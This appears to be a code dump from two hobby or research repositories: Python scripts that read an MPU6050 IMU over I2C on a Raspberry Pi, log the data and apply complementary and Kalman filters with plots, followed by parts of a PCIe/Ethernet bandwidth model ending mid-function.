import pickle
# Register
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
def read_byte(reg):
return bus.read_byte_data(address, reg)
def read_word(reg):
h = bus.read_byte_data(address, reg)
l = bus.read_byte_data(address, reg + 1)
value = (h << 8) + l
return value
def read_word_2c(reg):
val = read_word(reg)
if val >= 0x8000:
return -((65535 - val) + 1)
else:
return val
bus = smbus.SMBus(1) # bus = smbus.SMBus(0) fuer Revision 1
address = 0x68 # via i2cdetect
# Activate to be able to address the module
bus.write_byte_data(address, power_mgmt_1, 0)
# File:
file_name = 'capture_0010.mpudat'
measurement = np.zeros((10,)) # angles,gyro,acc,t
# this erase/initiates the file
with open(file_name, 'wb') as f:
np.save(f, measurement)
while True:
gyro_x = read_word_2c(0x43) / 131
gyro_y = read_word_2c(0x45) / 131
gyro_z = read_word_2c(0x47) / 131
acc_x = read_word_2c(0x3b) / 16384.0
acc_y = read_word_2c(0x3d) / 16384.0
acc_z = read_word_2c(0x3f) / 16384.0
# convert to Angles and Angular Velocities:
factor = 180/np.pi # set to 1 if output in radians.
roll, pitch, yaw = helpers.get_roll_pitch_yaw(acc_x, acc_y, acc_z, factor=factor)
measurement[0] = int(round(time.time() * 1000))
measurement[1:4] = np.array([roll, pitch, yaw])
measurement[4:7] = np.array([gyro_x, gyro_y, gyro_z])
measurement[7:10] = np.array([acc_x, acc_y, acc_z])
with open(file_name, 'ab') as f:
np.save(f,measurement)
print(measurement)
time.sleep(0.001)
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,443
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/test.py
|
# TODO:
# Stream to a file, and plot the raw data in degrees and rad/sec
import time
import pickle
import numpy as np
roll = 1.4
pitch = 2.3
yaw = 3.0
measurement = np.zeros((10,))
measurement[1:4] = np.array([roll, pitch, yaw])
measurement[4:7] = np.array([roll, pitch, yaw])
measurement[7:10] = np.array([roll, pitch, yaw])
print(measurement)
file_name = 't.t'
from pathlib import Path
import numpy as np
import os
p = Path('temp.npy')
with p.open('ab') as f:
np.save(f, np.zeros(2))
np.save(f, np.ones(2))
with p.open('rb') as f:
fsz = os.fstat(f.fileno()).st_size
out = np.load(f)
while f.tell() < fsz:
out = np.vstack((out, np.load(f)))
print(out)
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,444
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0038_display_offline.py
|
import numpy as np
import pickle
import matplotlib
import tkinter as tk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2Tk
from matplotlib.figure import Figure
import matplotlib.animation as animation
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import style
import helpers as helpers
import filters as filters
# --------------------------------------------------------------------------------------------------------------------
# Read the File / Load data:
# --------------------------------------------------------------------------------------------------------------------
file_name = 'capture_0010.mpudat'
t, angles, _, w = helpers.get_data_from_file(file_name, degrees=True)
# --------------------------------------------------------------------------------------------------------------------
# Sensor fusion:
# --------------------------------------------------------------------------------------------------------------------
w_0 = np.zeros((3, 1))
# remove initial bias (Assume it starts static)
w = w - w[:, 1:2]
w_0 = w[:, 2]
comp_filter = filters.ComplementaryFilter(x_0=np.zeros((3, 1)), w_0=w_0, alpha=0.9)
kf_filter = filters.KalmanFilter(sigma_angles=3**2, sigma_w=2**2)
cf_angles = np.zeros((3, t.shape[0]))
kf_angles = np.zeros((3, t.shape[0]))
pts_cf = np.zeros((3, 8, t.shape[0]))
pts_kf = np.zeros((3, 8, t.shape[0]))
pts_acc = np.zeros((3, 8, t.shape[0]))
for t_idx in range(1, t.shape[0]):
dt = t[t_idx] - t[t_idx-1]
comp_filter.update(angles_=angles[:, t_idx], w_=w[:, t_idx], dt_=dt)
kf_filter.process(dt=dt, ac_angles_i=angles[:, t_idx], gr_W_i=w[:, t_idx])
# get the values from the filters:
cf_angles[:, t_idx] = comp_filter.x[:, 0]
kf_angles[:, t_idx] = kf_filter.kf_angles[:, 0]
# rotate the points to plot one by one:
pts_acc[:, :, t_idx] = helpers.rotate_corners(angles[:, t_idx])
pts_cf[:, :, t_idx] = helpers.rotate_corners(cf_angles[:, t_idx])
pts_kf[:, :, t_idx] = helpers.rotate_corners(kf_angles[:, t_idx])
# --------------------------------------------------------------------------------------------------------------------
# Assume the data is arriving one by one and plot it
# --------------------------------------------------------------------------------------------------------------------
style.use("ggplot")
# GLOBAL VARIABLES
f = Figure(figsize=(5,5), dpi=100)
ax_roll = f.add_subplot(2,3,1)
ax_pitch = f.add_subplot(2,3,2)
ax_yaw = f.add_subplot(2,3,3)
#ax_acc = f.add_subplot(2,3,4, projection="3d")
#ax_acc.set_aspect("auto")
#ax_acc.set_autoscale_on(True)
ax_kf = f.add_subplot(2,3,6, projection="3d")
ax_kf.set_aspect("auto")
ax_kf.set_autoscale_on(True)
def animate(idx):
if idx % 1 == 0:
ax_roll.clear()
ax_pitch.clear()
ax_yaw.clear()
#ax_acc.clear()
ax_kf.clear()
# plot cube:
pt_a = pts_acc[:, :, idx]
pt_cf = pts_cf[:, :, idx]
pt_kf = pts_kf[:, :, idx]
for j in range(0, 2):
# up/down
if False:
ax_cf.plot3D(*zip(pt_cf[:, 0 + j], pt_cf[:, 2 + j]), color="g")
ax_cf.plot3D(*zip(pt_cf[:, 0 + j], pt_cf[:, 4 + j]), color="g")
ax_cf.plot3D(*zip(pt_cf[:, 4 + j], pt_cf[:, 6 + j]), color="g")
ax_cf.plot3D(*zip(pt_cf[:, 6 + j], pt_cf[:, 2 + j]), color="g")
ax_cf.plot3D(*zip(pt_cf[:, 0 + 2 * j], pt_cf[:, 1 + 2 * j]), color="g")
ax_cf.plot3D(*zip(pt_cf[:, 4 + 2 * j], pt_cf[:, 5 + 2 * j]), color="g")
ax_acc.plot3D(*zip(pt_a[:, 0 + j], pt_a[:, 2 + j]), color="g")
ax_acc.plot3D(*zip(pt_a[:, 0 + j], pt_a[:, 4 + j]), color="g")
ax_acc.plot3D(*zip(pt_a[:, 4 + j], pt_a[:, 6 + j]), color="g")
ax_acc.plot3D(*zip(pt_a[:, 6 + j], pt_a[:, 2 + j]), color="g")
ax_acc.plot3D(*zip(pt_a[:, 0 + 2 * j], pt_a[:, 1 + 2 * j]), color="g")
ax_acc.plot3D(*zip(pt_a[:, 4 + 2 * j], pt_a[:, 5 + 2 * j]), color="g")
ax_kf.plot3D(*zip(pt_kf[:, 0 + j], pt_kf[:, 2 + j]), color="g")
ax_kf.plot3D(*zip(pt_kf[:, 0 + j], pt_kf[:, 4 + j]), color="g")
ax_kf.plot3D(*zip(pt_kf[:, 4 + j], pt_kf[:, 6 + j]), color="g")
ax_kf.plot3D(*zip(pt_kf[:, 6 + j], pt_kf[:, 2 + j]), color="g")
ax_kf.plot3D(*zip(pt_kf[:, 0 + 2 * j], pt_kf[:, 1 + 2 * j]), color="g")
ax_kf.plot3D(*zip(pt_kf[:, 4 + 2 * j], pt_kf[:, 5 + 2 * j]), color="g")
if False:
ax_cf.set_xlim([-10, 10])
ax_cf.set_ylim([-10, 10])
ax_cf.set_zlim([-10, 10])
ax_acc.set_xlim([-10, 10])
ax_acc.set_ylim([-10, 10])
ax_acc.set_zlim([-10, 10])
ax_kf.set_xlim([-10, 10])
ax_kf.set_ylim([-10, 10])
ax_kf.set_zlim([-10, 10])
#
ax_roll.plot(t[1:idx], np.rad2deg(angles[0, 1:idx]), label='acc')
#ax_roll.plot(t[1:idx], np.rad2deg(cf_angles[0, 1:idx]), label='cf')
ax_roll.plot(t[1:idx], np.rad2deg(kf_angles[0, 1:idx]), label='kf')
ax_pitch.plot(t[1:idx], np.rad2deg(angles[1, 1:idx]))
#ax_pitch.plot(t[1:idx], np.rad2deg(cf_angles[1, 1:idx]))
ax_pitch.plot(t[1:idx], np.rad2deg(kf_angles[1, 1:idx]))
ax_yaw.plot(t[1:idx], np.rad2deg(angles[2, 1:idx]))
#ax_yaw.plot(t[1:idx], np.rad2deg(cf_angles[2, 1:idx]))
ax_yaw.plot(t[1:idx], np.rad2deg(kf_angles[2, 1:idx]))
ax_roll.set_title(' t = ' + "{:.2f}".format(t[idx]))
if False:
ax_cf.set_title('CF')
ax_acc.set_title('pure Acc')
ax_kf.set_title('KF')
ax_roll.set_ylim([-100,100])
ax_pitch.set_ylim([-100, 100])
ax_yaw.set_ylim([-100,100])
ax_roll.set_xlim([0, 30])
ax_pitch.set_xlim([0, 30])
ax_yaw.set_xlim([0, 30])
ax_roll.legend()
idx = idx + 1
class MyApp(tk.Tk):
def __init__(self, *args, **kargs):
tk.Tk.__init__(self,*args,**kargs)
main_frame = tk.Frame(self)
main_frame.pack(side="top", fill="both", expand=True)
# configure grid of frame:
main_frame.grid_rowconfigure(0, weight=1)
main_frame.grid_columnconfigure(0, weight=1)
# set first visible frame and dictionary of frames to display:
frame = FirstFrame(main_frame, self)
self.frames = {}
self.frames[FirstFrame] = frame
frame.grid(row=0, column=0,sticky="nsew")
self.show_frame(FirstFrame)
def show_frame(self, class_name):
frame = self.frames[class_name]
frame.tkraise()
class FirstFrame(tk.Frame):
def __init__(self, parent_frame, controller):
tk.Frame.__init__(self, parent_frame)
# define things in the frame:
self.label = tk.Label(self, text="MPU 6048")
self.label.pack(pady=10, padx=10)
# add figure to Canvas:
canvas = FigureCanvasTkAgg(f, self)
canvas.draw()
canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=True)
# Navigator:
toolbar = NavigationToolbar2Tk(canvas,self)
toolbar.update()
canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
app = MyApp()
ani = animation.FuncAnimation(f, animate, interval = 1)
app.mainloop()
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,445
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/filters.py
|
import numpy as np
class ComplementaryFilter:
def __init__(self, x_0, w_0=np.zeros((3, 1)), alpha=0.9):
self.x = x_0 # initial State
self.x_0 = x_0 # just a copy for memory
self.w_0 = w_0 # initial gyro angular value (to remove since we assume it's static)
self.alpha = alpha # CF factor
def update(self, angles_, w_, dt_):
# remove w_0:
angles_ = np.expand_dims(angles_, axis=1)
w_ = np.expand_dims(w_, axis=1)
self.x = (1 - self.alpha) * angles_ + self.alpha * (self.x + (w_ - self.w_0) * dt_)
class KalmanFilter:
# https: // eu.mouser.com / applications / sensor_solutions_mems /
def __init__(self, sigma_angles, sigma_w):
self.sigma_angles = sigma_angles
self.sigma_w = sigma_w
self.sigma_b = sigma_w
self.kf_angles = np.zeros((3, 1))
self.kf_b = np.zeros((3, 1))
P = np.array([[self.sigma_w * (10e-3)**2, 0], [0, self.sigma_b]])
self.kf_P = np.array([P, P, P])
def process(self, dt, ac_angles_i, gr_W_i):
A = np.array([[1, -dt], [0, 1]])
B = np.array([[dt], [0]])
H = np.array([[1, 0]])
R = self.sigma_angles
Q = np.array([[self.sigma_w ** 2 * dt ** 2, 0], [0, self.sigma_b ** 2]])
for cmp_idx in range(0, 3):
x_prev = np.zeros((2, 1))
x_prev[0] = self.kf_angles[cmp_idx]
x_prev[1] = self.kf_b[cmp_idx]
P = self.kf_P[cmp_idx]
u = gr_W_i[cmp_idx]
z = ac_angles_i[cmp_idx]
# predict:
x_prdct = np.matmul(A, x_prev) + B*u
P_prdct = np.matmul(np.matmul(A, P), np.transpose(A)) + Q
# update:
S = (np.matmul(np.matmul(H, P_prdct), np.transpose(H)) + R)
kf_gain = np.matmul(np.matmul(P_prdct, np.transpose(H)), np.linalg.inv(S))
y = z - np.matmul(H, x_prdct)
x_new = x_prdct + np.matmul(kf_gain, y)
P_new = np.matmul(np.identity(2) - np.matmul(kf_gain, H), np.linalg.inv(P_prdct))
# save for next iteration
self.kf_angles[cmp_idx] = x_new[0]
self.kf_b[cmp_idx] = x_new[1]
self.kf_P[cmp_idx] = P_new
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,446
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0010_test_raspy_mpu6050_console.py
|
#!/usr/bin/python
import smbus
import numpy as np
import helpers as helpers
import time
# source: https://tutorials-raspberrypi.com/measuring-rotation-and-acceleration-raspberry-pi/
# Register
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
def read_byte(reg):
return bus.read_byte_data(address, reg)
def read_word(reg):
h = bus.read_byte_data(address, reg)
l = bus.read_byte_data(address, reg + 1)
value = (h << 8) + l
return value
def read_word_2c(reg):
val = read_word(reg)
if val >= 0x8000:
return -((65535 - val) + 1)
else:
return val
bus = smbus.SMBus(1) # bus = smbus.SMBus(0) fuer Revision 1
address = 0x68 # via i2cdetect
# Activate to be able to address the module
bus.write_byte_data(address, power_mgmt_1, 0)
while True:
gyro_x = read_word_2c(0x43) / 131
gyro_y = read_word_2c(0x45) / 131
gyro_z = read_word_2c(0x47) / 131
acc_x = read_word_2c(0x3b) / 16384.0
acc_y = read_word_2c(0x3d) / 16384.0
acc_z = read_word_2c(0x3f) / 16384.0
# convert to Angles and Angular Velocities:
factor = 180/np.pi # set to 1 if output in radians.
roll, pitch, yaw = helpers.get_roll_pitch_yaw(acc_x, acc_y, acc_z, factor=factor)
# log incoming data:
print('-- Raw data:')
print("gyro [deg/sec] wx,wy,wz: {0:.2f},{1:.2f},{2:.2f}".format(gyro_x, gyro_y, gyro_z))
print("acc [ ] ax,ay,az: {0:.2f},{1:.2f},{2:.2f}".format(acc_x, acc_y, acc_z))
print('-- angles acc only: factor=1 (radians), factor=180/pi (degrees)')
print("roll,pitch,yaw: {0:.2f},{1:.2f},{2:.2f}".format(roll, pitch, yaw))
time.sleep(1)
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,447
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/helpers.py
|
#!/usr/bin/python
import math
import numpy as np
import os
def dist(a, b):
return math.sqrt((a * a) + (b * b))
def get_roll_pitch_yaw(x, y, z, factor=1):
roll = np.arctan2(x, np.sqrt(y ** 2 + z ** 2)) * factor
pitch = np.arctan2(y, np.sqrt(x ** 2 + z ** 2)) * factor
yaw = np.arctan2(np.sqrt(x ** 2 + y ** 2), z) * factor
return -roll, pitch, yaw
# Get values from file:
def get_data_from_file(file_name, degrees=True):
data = []
with open(file_name, 'rb') as f:
while f.tell() < os.fstat(f.fileno()).st_size:
try:
data.append(np.load(f))
except EOFError:
break
data = np.array(data)
# time: remove t0:
t = data[:, 0]/1000 # in seconds
t = t - t[1]
t[0] = 0
# angles
angles = data[:, 1:4]
if ~degrees:
print('From file: angles in radians')
angles = angles*np.pi/180
else:
print('From file: angles in degrees')
# rest of data: acc, gyro
acc = data[:, 4:7]
w = data[:, 7:10]
w[:, 0] = w[:, 0]*-1 # correction of sign in wx
t = np.transpose(t)
angles = np.transpose(angles)
acc = np.transpose(acc)
w = np.transpose(w)
return t, angles, acc, w
def rotate_corners(angles):
roll = angles[0]
pitch = angles[1]
yaw = angles[2]
# points =
p = np.array([[1., 1, 1, 1, -1, -1, -1, -1],
[1, 1, -1, -1, 1, 1, -1, -1],
[1, -1, 1, -1, 1, -1, 1, -1]])
scale = np.array([4.5, 3, 1.25])
scale = np.expand_dims(scale, axis=1)
p = scale * p
# rotation matrices:
Rtheta = np.array([[np.cos(-roll), 0., -np.sin(-roll)], [0., 1., 0.], [np.sin(-roll), 0., np.cos(-roll)]])
Rphi = np.array([[1., 0, 0.], [0., np.cos(-pitch), np.sin(-pitch)], [0., -np.sin(-pitch), np.cos(-pitch)]])
Rrho = np.array([[np.cos(yaw), np.sin(yaw), 0.], [-np.sin(yaw), np.cos(yaw), 0], [0, 0, 1]])
pt = np.matmul(Rrho, np.matmul(Rphi, np.matmul(Rtheta, p)))
return pt
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,448
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0030_recover_from_file.py
|
import numpy as np
import matplotlib.pyplot as plt
import helpers as helpers
# --------------------------------------------------------------------------------------------------------------------
# Read the File / Load data:
# --------------------------------------------------------------------------------------------------------------------
file_name = 'capture_0010.mpudat'
t, angles, acc, w = helpers.get_data_from_file(file_name, degrees=True)
# get angles from gyros:
angles_g = np.zeros_like(angles)
tmp = np.zeros((3, 1))
w = w - w[:, 0:1]
for i in range(1,angles_g.shape[1]):
dt = t[i] - t[i-1]
angles_g[:, i] = angles_g[:, i-1] + dt*w[:, i]
# --------------------------------------------------------------------------------------------------------------------
# Plot the data:
# --------------------------------------------------------------------------------------------------------------------
fig, axs = plt.subplots(3, 3)
for i in range(0, 3):
axs[0, i].plot(t, angles[i, :])
axs[0, i].plot(t, angles_g[i, :])
axs[1, i].plot(t, acc[i, :])
axs[2, i].plot(t, w[i, :])
for j in range(0,3):
axs[j, i].set_xlim(-1, 50)
axs[j, i].grid()
# Labels/Titles:
axs[0,0].set_title('roll')
axs[0,1].set_title('pitch')
axs[0,2].set_title('yaw')
axs[1,0].set_title('acc_x')
axs[1,1].set_title('acc_y')
axs[1,2].set_title('acc_z')
axs[2,0].set_title('w_x')
axs[2,1].set_title('w_y')
axs[2,2].set_title('w_z')
plt.show()
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,449
|
evertismael/mpu6050-visualizer
|
refs/heads/main
|
/0035_batch_offline_processing.py
|
import numpy as np
import matplotlib.pyplot as plt
import helpers as helpers
import filters as filters
# --------------------------------------------------------------------------------------------------------------------
# Read the File / Load data:
# --------------------------------------------------------------------------------------------------------------------
file_name = 'capture_0010.mpudat'
t, angles, _, w = helpers.get_data_from_file(file_name, degrees=True)
# --------------------------------------------------------------------------------------------------------------------
# Sensor fusion:
# --------------------------------------------------------------------------------------------------------------------
w_0 = np.zeros((3, 1))
# remove initial bias (Assume it starts static)
w = w - w[:, 2:3]
angles[0,:] = angles[0,:]*-1
w[0,:] = w[0,:]
w_0 = w[:, 2]
comp_filter = filters.ComplementaryFilter(x_0=np.zeros((3, 1)), w_0=w_0, alpha=0.8)
kf_filter = filters.KalmanFilter(sigma_angles=4**2, sigma_w=2**2)
cf_angles = np.zeros((3, t.shape[0]))
kf_angles = np.zeros((3, t.shape[0]))
for t_idx in range(1, t.shape[0]):
dt = t[t_idx] - t[t_idx-1]
comp_filter.update(angles_=angles[:, t_idx], w_=w[:, t_idx], dt_=dt)
kf_filter.process(dt=dt, ac_angles_i=angles[:, t_idx], gr_W_i=w[:, t_idx])
# get the values from the filters:
cf_angles[:, t_idx] = comp_filter.x[:, 0]
kf_angles[:, t_idx] = kf_filter.kf_angles[:, 0]
# --------------------------------------------------------------------------------------------------------------------
# Plot the data:
# --------------------------------------------------------------------------------------------------------------------
fig, axs = plt.subplots(3, 1)
for i in range(0, 3):
axs[i].plot(t, np.rad2deg(angles[i, :]), label='Accelerometer')
axs[i].plot(t, np.rad2deg(cf_angles[i, :]), label='Comp Filter')
axs[i].plot(t, np.rad2deg(kf_angles[i, :]), label='Kalman Filter')
axs[i].set_xlim(-1, 30)
axs[i].set_ylim(-90, 90)
axs[i].grid()
axs[0].set_title('roll')
axs[1].set_title('pitch')
axs[2].set_title('yaw')
axs[2].legend(loc='lower right')
plt.show()
|
{"/0020_stream_to_file.py": ["/helpers.py"], "/0038_display_offline.py": ["/helpers.py", "/filters.py"], "/0010_test_raspy_mpu6050_console.py": ["/helpers.py"], "/0030_recover_from_file.py": ["/helpers.py"], "/0035_batch_offline_processing.py": ["/helpers.py", "/filters.py"]}
|
34,456
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/eth.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Some general function and data to calculate rates for Ethernet"""
# pylint: disable=bad-whitespace
# pylint: disable=invalid-name
# pylint: disable=too-many-instance-attributes
import sys
# Configuration options
Variants = ['400GigE', '200GigE', '100GigE', '50GigE', '40GigE', '25GigE', '10GigE', 'GigE']
# Various fields on the wire, all in Bytes
Pre = 7 # Preamble
SOF = 1 # Start of Frame indicator
Hdr = 14 # Header
Hdr_VLAN = 18 # Header including 802.18 Tag
MinPayLoad = 46 # Minimum Payload size
MinPayLoad_VLAN = 42 # Minimum Payload size
CRC = 4 # Checksum
IFG = 12 # Interframe Gap
IFG_GigE = 8 # Optionally reduce IFG for 1GigE
IFG_10GigE = 5 # Optionally reduce IFG for 10GigE
IFG_25GigE = 5 # Optionally reduce IFG for 10GigE
IFG_40plusGigE = 1 # Optionally reduce IFG for 40GigE
class Cfg():
"""A class representing an Ethernet link. Allows to get
various metrics based on a specific configuration"""
def __init__(self, variant='40GigE', vlan=True, ifg_min=False):
"""Instantiate a Ethernet config.
- variant: One of the Variants
- vlan: Should the frames contain a VLAN tag
- ifg_min: minimum allowed interframe gap or standard
"""
if variant not in Variants:
raise Exception("Unsupported ethernet variant: %s" % variant)
self.variant = variant
self.vlan = vlan
self.ifg_min = ifg_min
if variant == '400GigE':
self.rate = 400 * 1000 * 1000 * 1000
elif variant == '200GigE':
self.rate = 200 * 1000 * 1000 * 1000
elif variant == '100GigE':
self.rate = 100 * 1000 * 1000 * 1000
elif variant == '50GigE':
self.rate = 50 * 1000 * 1000 * 1000
elif variant == '40GigE':
self.rate = 40 * 1000 * 1000 * 1000
elif variant == '25GigE':
self.rate = 25 * 1000 * 1000 * 1000
elif variant == '10GigE':
self.rate = 10 * 1000 * 1000 * 1000
elif variant == 'GigE':
self.rate = 1000 * 1000 * 1000
self.pre_sz = Pre + SOF
if vlan:
self.hdr_sz = Hdr_VLAN
self.min_pay = MinPayLoad_VLAN
else:
self.hdr_sz = Hdr
self.min_pay = MinPayLoad
if ifg_min:
if variant == 'GigE':
self.trail_sz = IFG_GigE
elif variant == '10GigE':
self.trail_sz = IFG_10GigE
elif variant == '25GigE':
self.trail_sz = IFG_25GigE
else:
self.trail_sz = IFG_40plusGigE
else:
self.trail_sz = IFG
self.crc_sz = CRC
def pps(self, payload):
"""Return the rate of packets for a given payload"""
if payload < self.min_pay:
p_sz = self.min_pay
else:
p_sz = payload
s = self.pre_sz + self.hdr_sz + p_sz + self.crc_sz + self.trail_sz
return self.rate / float(s * 8)
def bps(self, payload):
"Bits per second of payload bits"
p = self.pps(payload)
return p * payload * 8
def pps_ex(self, frame_sz):
"""Return the rate of packets for a given payload. Assume
@frame_sz includes ethernet header and CRC"""
s = frame_sz - self.hdr_sz - self.crc_sz
return self.pps(s)
def bps_ex(self, frame_sz):
"""Bits per second of payload bits for a given payload. Assume
@frame_sz includes ethernet header and CRC"""
p = self.pps_ex(frame_sz)
return p * frame_sz * 8
def us_ex(self, frame_sz):
"""Calculate how long (in us) it takes to transmit a frame
of a given size. Assume @frame_sz includes ethernet header and CRC."""
s = (frame_sz + self.pre_sz + self.trail_sz)
return (float(s * 8)/self.rate) * 1000 * 1000
if __name__ == '__main__':
variant = '100GigE'
if len(sys.argv) == 2:
variant = sys.argv[1]
# not much of a test
e = Cfg(variant)
print("%4s %9s %11s %s" % ("sz", "pps", "bps", "ns"))
for sz in [64, 128, 256, 512, 1024, 1518, 4096, 9000]:
print("%4d %9d %11d %.2f" % (sz, e.pps_ex(sz), e.bps_ex(sz), 1000.0 * e.us_ex(sz)))
dat = open("eth.dat", "w")
dat.write("\"Frame Size(Bytes)\" "
"\"Packets/s\" "
"\"Bits/s\" "
"\"Gb/s\" "
"\"Time (us)\" "
"\n")
for sz in range(64, 1519):
_pps = e.pps_ex(sz)
bw = e.bps_ex(sz)
gbs = float(bw) / (1000 * 1000 * 1000)
us = e.us_ex(sz)
dat.write("%d %f %f %f %f\n" % (sz, _pps, bw, gbs, us))
|
{"/model/util.py": ["/model/__init__.py"], "/model/mem_bw.py": ["/model/__init__.py"], "/model/niantic.py": ["/model/__init__.py"], "/nic_bw.py": ["/model/__init__.py"], "/model/simple_nic.py": ["/model/__init__.py"], "/pcie_bw.py": ["/model/__init__.py"]}
|
34,457
|
pcie-bench/pcie-model
|
refs/heads/master
|
/model/util.py
|
## Copyright (C) 2015-2018 Rolf Neugebauer. All rights reserved.
## Copyright (C) 2015 Netronome Systems, Inc. All rights reserved.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
"""Utility functions"""
from . import pcie
# pylint: disable=invalid-name
# pylint: disable=too-many-arguments
# pylint: disable=too-many-locals
def low_com_mul(x, y):
"""Find the lowest common multiplier of two numbers
"""
def find_gcf(dividend, divisor):
reminder = -1
while reminder != 0:
reminder = dividend % divisor
if reminder != 0:
dividend = divisor
divisor = reminder
return divisor
def find_lcm(x, y, gcf):
lcm = (x*y)/gcf
return lcm
gcf = 0
lcm = 0
if x > y:
dividend = x
divisor = y
else:
dividend = y
divisor = x
gcf = find_gcf(dividend, divisor)
lcm = find_lcm(x, y, gcf)
return lcm
def gen_res(bwspec, direction, data_sz,
tx_rx_data_B, tx_tx_data_B, rx_rx_data_B, rx_tx_data_B):
"""Work out the result based on the available bandwidth (@bwspec),
@direction of transfer and how many bytes were transferred
(@data_sz).
The caller also has to provide:
@tx_rx_data_B: Bytes for TX received by the device
@tx_tx_data_B: Bytes for TX transmitted by the device
@rx_rx_data_B: Bytes for RX received by the device
@rx_tx_data_B: Bytes for RX transmitted by the device
"""
# Work out overall bytes in each direction per batch
raw_rx_B = 0
raw_tx_B = 0
if direction & pcie.DIR_TX != 0:
# DIR_TX is from the device, so we look at rx_??_data_B
raw_rx_B += rx_rx_data_B
raw_tx_B += rx_tx_data_B
if direction & pcie.DIR_RX != 0:
# DIR_RX is from the device, so we look at tx_??_data_B
raw_rx_B += tx_rx_data_B
raw_tx_B += tx_tx_data_B
if bwspec.type == pcie.BW_Spec.BW_RAW:
# this calculation only makes sense if a raw bandwidth has been
# specified. We work out if raw_tx_b fits in the available
# bandwidth. If not, we need to adjust the number of rx blocks...
raw_tx_b = raw_tx_B * 8
raw_rx_b = raw_rx_B * 8
avail_raw_tx_bw_b = bwspec.tx_bw * (10**9)
avail_raw_rx_bw_b = bwspec.rx_bw * (10**9)
# work out how many transactions the RX can cope with
max_trans = avail_raw_rx_bw_b / float(raw_rx_b)
# assume we can support the RX data rate with TX for requests
req_raw_tx_bw_b = max_trans * raw_tx_b
if req_raw_tx_bw_b > avail_raw_tx_bw_b:
# can't send enough requests as we'd run out of TX bandwidth
# Adjust the tx and rx work. Assume TX is maxed out
req_raw_tx_bw_b = avail_raw_tx_bw_b
# number of read requests we can support
max_trans = req_raw_tx_bw_b / float(raw_tx_b)
# work out new rx bandwidth
req_raw_rx_bw_b = max_trans * raw_rx_b
else:
# we are maxed out on RX, so just use the tlp_bw
req_raw_rx_bw_b = avail_raw_rx_bw_b
req_raw_tx_bw = req_raw_tx_bw_b / float(10**9)
req_raw_rx_bw = req_raw_rx_bw_b / float(10**9)
if direction & pcie.DIR_TX and direction & pcie.DIR_RX:
eff_tx_bw = data_sz * req_raw_tx_bw / float(raw_tx_B)
eff_rx_bw = data_sz * req_raw_rx_bw / float(raw_rx_B)
elif direction & pcie.DIR_TX:
eff_tx_bw = data_sz * req_raw_tx_bw / float(raw_tx_B)
eff_rx_bw = 0.0
elif direction & pcie.DIR_RX:
eff_tx_bw = 0.0
eff_rx_bw = data_sz * req_raw_rx_bw / float(raw_rx_B)
else: # BW_EFF
if direction & pcie.DIR_TX and direction & pcie.DIR_RX:
eff_tx_bw = bwspec.tx_bw
eff_rx_bw = bwspec.rx_bw
req_raw_tx_bw = eff_tx_bw * raw_tx_B / float(data_sz)
